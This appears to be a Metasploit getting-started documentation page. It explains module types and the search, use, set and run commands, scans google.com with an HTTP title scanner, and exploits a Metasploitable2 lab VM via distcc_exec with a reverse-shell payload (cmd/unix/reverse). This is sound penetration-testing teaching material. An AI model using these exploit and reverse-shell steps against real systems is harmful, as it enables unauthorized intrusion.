Assuming you now have Metasploit installed, run the msfconsole command to open Metasploit:

Finding Modules

Metasploit is based around the concept of modules. The most commonly used module types are:

  • Auxiliary - Auxiliary modules do not exploit a target, but can perform data gathering or administrative tasks
  • Exploit - Exploit modules leverage vulnerabilities in a manner that allows the framework to execute arbitrary code on the target host
  • Payloads - Arbitrary code that can be executed on a remote target to perform a task, such as creating users, opening shells, etc
  • Post - Post modules are used after a machine has been compromised. They perform useful tasks such as gathering, collecting, or enumerating data from a session.

You can use the search command to search for modules:

  search type:auxiliary http html title tag

You can use a Metasploit module by specifying the full module name. The prompt will be updated to indicate the currently active module:

Example:

  use auxiliary/scanner/http/title

Each module offers configurable options which can be viewed with the show options, or aliased options, command:

  show options

To set a module option, use the set command. We will set the RHOST option - which represents the target host(s) that the module will run against:

  set RHOSTS google.com

The run command will run the module against the target, showing the target’s HTTP title:

We can also run modules with options set as part of the run command. For instance, setting both RHOSTS and enabling HttpTrace functionality:

  run rhosts=google.com httptrace=true

There is quite a lot of information on the output and you can scroll more to see it.

Running exploit modules

Exploit modules require a vulnerable target. It is recommended to set up your own local test environment to run modules against. For instance in a Virtual Machine, or with Docker. There are multiple pre-built vulnerable test environments including:

Metasploitable2 Metasploitable3 For instance - targeting a vulnerable Metasploitable2 VM and using the unix/misc/distcc_exec module:

  use unix/misc/distcc_exec

Exploit modules will generally at a minimum require the following options to be set:

  • RHOST - The remote target host address
  • LHOST - The listen address. Important This may need to be set to your tun0 IP address or similar, if you are connecting to your target over a VPN
  • PAYLOAD - The code to be executed after an exploit is successful. For instance creating a user, or a Metasploit session. Often this can be left as the default value, but may sometimes require configuration

Each module offers configurable options which can be viewed with the show options, or aliased options, command:

For this scenario you can manually set each of the required option values (RHOST, LHOST, and optionally PAYLOAD):

  set rhost => 192.168.123.133
set lhost 192.168.123.1
set payload cmd/unix/reverse

The run command will run the module against the target, there is also an aliased exploit command which will perform the same action:

  run

You have now learnt how to find and run modules in Metasploit, as well as how to make some custom configurations.

Edit this page

Last updated 09 Jul 2024, 16:15 +0200 . history